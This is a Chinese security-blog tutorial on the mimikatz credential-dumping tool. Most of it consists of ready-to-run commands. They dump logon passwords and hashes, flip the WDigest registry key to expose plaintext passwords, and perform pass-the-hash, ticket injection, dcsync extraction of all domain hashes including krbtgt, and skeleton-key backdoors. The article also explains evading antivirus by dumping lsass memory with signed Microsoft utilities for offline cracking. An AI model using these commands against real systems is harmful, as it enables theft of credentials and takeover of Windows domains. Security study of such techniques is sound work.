点击蓝字
关注我们
始于理论,源于实践,终于实战
老付话安全,每天一点点
激情永无限,进步看得见
严正声明
本号所写文章方法和工具只用于学习和交流,严禁使用文章所述内容中的方法未经许可的情况下对生产系统进行方法验证实施,发生一切问题由相关个人承担法律责任,其与本号无关。
特此声明!!!
mimikatz
mimikatz轻量级调试神器,可以提升进程权限、注入进程、读取进程内存,可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码(sass是微软Windows系统的安全机制它主要用于本地安全和登陆策略)。包括从Windows系统中提取明文密码、Kerberos票据以及密码哈希等敏感信息。
运行使用
在网络上下载mimikatz
在X64中有.exe应用程序,右击以管理员运行(注意:杀毒软件会把它杀掉,需要关闭所有杀毒软件)
运行后如下:
输入privilege::debug提升权限
输入sekurlsa::logonpasswords,抓取密码
注:win10或2012R2以上版本,默认在内存缓存中禁止保存明文密码,但是可以通过修改注册表读到hash值。在cmd管理员权限下输入reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f,
再运行sekurlsa::logonpasswords,即可!
Hash传递
获取到NTLM哈希值,可以使用mimikatz对其进行哈希传递,使用以下命令
Sekurlsa::pth /user:XX /domian:http://xx.com /ntlm:XXXXXXXX
mimikatz常用命令
-
privilege::debug //提升权限
-
sekurlsa::logonpasswords //抓取密码
-
kerberos::list //列出存储票据
-
kerberos::purge //清空存储票据
-
kerberos::ptt XX.XX //导入票据
-
lsadump::dcsync /domain:http://XXXX.com /all /csv //获取所有域用户
-
lsadump::dcsync /domain:http://XXXX.com /user:XXX //指定获取某个用户的hash
-
lsadump::dcsync /domain:http://xx.com /user:krbtgt //获取krbtgt的用户hash
-
misc::skeleton //添加万能密钥
mimikatz高级应用
上面说,有杀毒软件会杀毒mimikatz,所以在使用这个工具就没法在目标机器上运行,这就需要用其他办法解决这个问题;因为系统登录用户名密码一般存在lsass.exe进程中,只要能获取到这个文件就可以在能够使用mimikatz的设备在进行密码获取。有三个文件可以合法获取lsass.exe进程,分别是Procdump.exeSQLDumper.execreatedump.exe,他们是微软签名的合法程序。
-
Procdump.exe用于转储进程内存,用Procdump 抓取lsass进程dmp文件:procdump64.exe -accepteula -ma lsass.exe lsass_dump,然后再配合mimikatz使用:
sekurlsa::Minidump
lsassdump.dmpsekurlsa::logonPasswords
还可以通过PID来获取
procdump64.exe -accepteula -ma pid lsass_dum
-
Sqldumper.exe实用工具是在 Microsoft SQL Server 中。 用于调试目的SQL Server和相关进程的内存转储。window系统自带,可以在一些目录下找到:
C:Program FilesMicrosoft SQL Server100SharedSqlDumper.exe
C:Program FilesMicrosoft Analysis ServicesAS OLEDB10SQLDumper.exe
C:Program Files (x86)Microsoft SQL Server100SharedSqlDumper.e
使用以下命令查看lsass.exe 的PID号
tasklist /svc | findstr lsass.exe
导出mdmp文件
Sqldumper.exe ProcessID 0 0x01100
在本地使用相同版本操作系统解密即可
mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit
Mimikatz模块还可以在Metasploit中加载,
use post/windows/gather/credentials/mimikatz
使用help mimikatz查看使用命令
kerberos模块:用于抓取kerberos证书
livessp模块:检索livessp凭据
mimikatz_command:可以让我们使用mimikatz的全部功能
msv模块:列出密码哈希
SSP模块:抓取SSP证书,安全支持提供程序(SSP)是Windows API,用于扩展Windows身份验证机制。
tspkg模块:抓取tspkg证书。
END
老付
欢迎扫码
关注我们
网络安全
原文始发于微信公众号(老付话安全):内网渗透工具mimikatz
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论